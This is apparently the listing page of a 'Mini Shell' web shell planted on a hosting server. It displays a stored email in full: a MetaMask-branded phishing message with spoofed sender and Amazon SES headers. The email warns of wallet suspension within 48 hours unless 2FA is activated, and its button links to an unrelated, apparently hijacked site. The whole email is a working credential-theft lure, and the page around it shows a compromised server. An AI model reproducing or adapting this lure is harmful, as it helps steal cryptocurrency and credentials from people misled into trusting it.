%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/casasdemontanacr/mail/new/
Upload File :
Create Path :
Current File : /home/casasdemontanacr/mail/new/1735625700.M533894P3278305.rocket.alojo.es,S=7630,W=7817

Return-Path: <postmaster@c9d6899d9c.nxcli.io>
Delivered-To: casasdemontanacr@rocket.alojo.es
Received: from rocket.alojo.es
	by rocket.alojo.es with LMTP
	id ILUaH+SLc2fhBTIAc/8f+g
	(envelope-from <postmaster@c9d6899d9c.nxcli.io>)
	for <casasdemontanacr@rocket.alojo.es>; Tue, 31 Dec 2024 00:15:00 -0600
Return-path: <postmaster@c9d6899d9c.nxcli.io>
Envelope-to: webmaster@casasdemontanacr.com
Delivery-date: Tue, 31 Dec 2024 00:15:00 -0600
Received: from cloudhost-5007466.au-south-1.nxcli.net ([103.224.90.81]:64446)
	by rocket.alojo.es with esmtps  (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
	(Exim 4.96.2)
	(envelope-from <postmaster@c9d6899d9c.nxcli.io>)
	id 1tSVWo-00Dl2W-00
	for webmaster@casasdemontanacr.com;
	Tue, 31 Dec 2024 00:15:00 -0600
Received: (qmail 24974 invoked by uid 10119); 31 Dec 2024 06:15:26 +0000
Date: 31 Dec 2024 06:15:26 +0000
Message-ID: <20241231061526.24972.qmail@cloudhost-5007466.au-south-1.nxcli.net>
To: webmaster@casasdemontanacr.com
Subject: =?UTF-8?B?UHJvdGVjdCBZb3VyIFdhbGxldDogQWN0aXZhdGUgMkZBIFRvZGF5?=
X-PHP-Originating-Script: 10119:mail.php
From: MetaMask Safety Alerts <77syvsuo@secure-metamask-protect.com>
Reply-To: no-reply@amazon.com
Content-Type: text/html; charset=UTF-8
MIME-Version: 1.0
X-Mailer: Amazon SES
X-Originating-IP: [127.0.0.1]
X-SES-Outgoing: 2019-09-30T12:34:56Z
X-Campaign-ID: 78775e32926611cb
List-Unsubscribe: <mailto:unsubscribe@amazon.com>
X-Spam-Status: No, score=2.1
X-Spam-Score: 21
X-Spam-Bar: ++
X-Ham-Report: Spam detection software, running on the system "rocket.alojo.es",
 has NOT identified this incoming email as spam.  The original
 message has been attached to this so you can view it or label
 similar future email.  If you have any questions, see
 root\@localhost for details.
 Content preview:  Secure Your Wallet Secure Your Wallet Dear Valued User, 
 Content analysis details:   (2.1 points, 5.0 required)
  pts rule name              description
 ---- ---------------------- --------------------------------------------------
  0.0 URIBL_BLOCKED          ADMINISTRATOR NOTICE: The query to URIBL was
                             blocked.  See
                             http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
                              for more information.
                             [URIs: metamask.io]
  0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The
                             query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                             [103.224.90.81 listed in bl.score.senderscore.com]
  0.0 RCVD_IN_VALIDITY_SAFE_BLOCKED RBL: ADMINISTRATOR NOTICE: The
                             query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                             [103.224.90.81 listed in sa-accredit.habeas.com]
  0.8 DKIM_ADSP_NXDOMAIN     No valid author signature and domain not in
                             DNS
  0.2 HEADER_FROM_DIFFERENT_DOMAINS From and EnvelopeFrom 2nd level
                             mail domains are different
  0.1 MIME_HTML_ONLY         BODY: Message only has text/html MIME parts
  0.0 HTML_MESSAGE           BODY: HTML included in message
  1.0 KAM_LAZY_DOMAIN_SECURITY Sending domain does not have any
                             anti-forgery methods
  0.0 KAM_DMARC_STATUS       Test Rule for DKIM or SPF Failure with Strict
                             Alignment
X-Spam-Flag: NO


<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Secure Your Wallet</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            background-color: #f4f4f4;
            font-family: Arial, sans-serif;
        }
        table {
            width: 100%;
            border-spacing: 0;
            margin: 0 auto;
        }
        .container {
            max-width: 600px;
            margin: 20px auto;
            background-color: #ffffff;
            border: 1px solid #dddddd;
            border-radius: 8px;
            overflow: hidden;
            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
        }
        .header {
            background: url('https://upload.wikimedia.org/wikipedia/commons/3/36/MetaMask_Fox.svg') no-repeat center;
            background-size: 150px;
            height: 100px;
            text-align: center;
            background-color: #333333;
        }
        .content {
            padding: 20px;
            color: #333333;
        }
        .content h1 {
            font-size: 24px;
            color: #2c3e50;
            margin-bottom: 15px;
        }
        .content p {
            font-size: 16px;
            line-height: 1.5;
            margin-bottom: 15px;
        }
        .cta-button {
            display: inline-block;
            text-decoration: none;
            background-color: #007bff;
            color: #ffffff;
            padding: 12px 25px;
            font-size: 16px;
            font-weight: bold;
            border-radius: 5px;
            margin-top: 20px;
        }
        .cta-button:hover {
            background-color: #0056b3;
        }
        .footer {
            background-color: #f9f9f9;
            text-align: center;
            padding: 15px;
            font-size: 12px;
            color: #888888;
            border-top: 1px solid #dddddd;
        }
        .footer a {
            color: #007bff;
            text-decoration: none;
        }
    </style>
</head>
<body>
    <table>
        <tr>
            <td align="center">
                <table class="container">
                    <!-- Header Section -->
                    <tr>
                        <td class="header"></td>
                    </tr>

                    <!-- Content Section -->
                    <tr>
                        <td class="content">
                            <h1>Secure Your Wallet</h1>
                            <p>Dear Valued User,</p>
                            <p>We noticed that Two-Factor Authentication (2FA) is not yet enabled on your MetaMask wallet. To safeguard your assets, we strongly recommend activating 2FA immediately.</p>
                            <p>Failure to activate 2FA within the next 48 hours may result in temporary suspension of your wallet to ensure its security.</p>
                            <p style="text-align: center;">
                                <a href="https://courses.teflinstitute.com/login/mt?id=1148500086602003596-7035" class="cta-button">Activate 2FA Now</a>
                            </p>
                            <p>If you have already activated 2FA, please ignore this message.</p>
                            <p>Thank you for being a part of the MetaMask community. Stay safe!</p>
                        </td>
                    </tr>

                    <!-- Footer Section -->
                    <tr>
                        <td class="footer">
                            <p>&copy; 2024 MetaMask. All rights reserved.</p>
                            <p>This email is automated. Please do not reply. For assistance, visit our <a href="https://metamask.io/support" target="_blank">Help Center</a>.</p>
                        </td>
                    </tr>
                </table>
            </td>
        </tr>
    </table>
</body>
</html>
<!-- Unique-ID: 67738bfec0293 -->

Zerion Mini Shell 1.0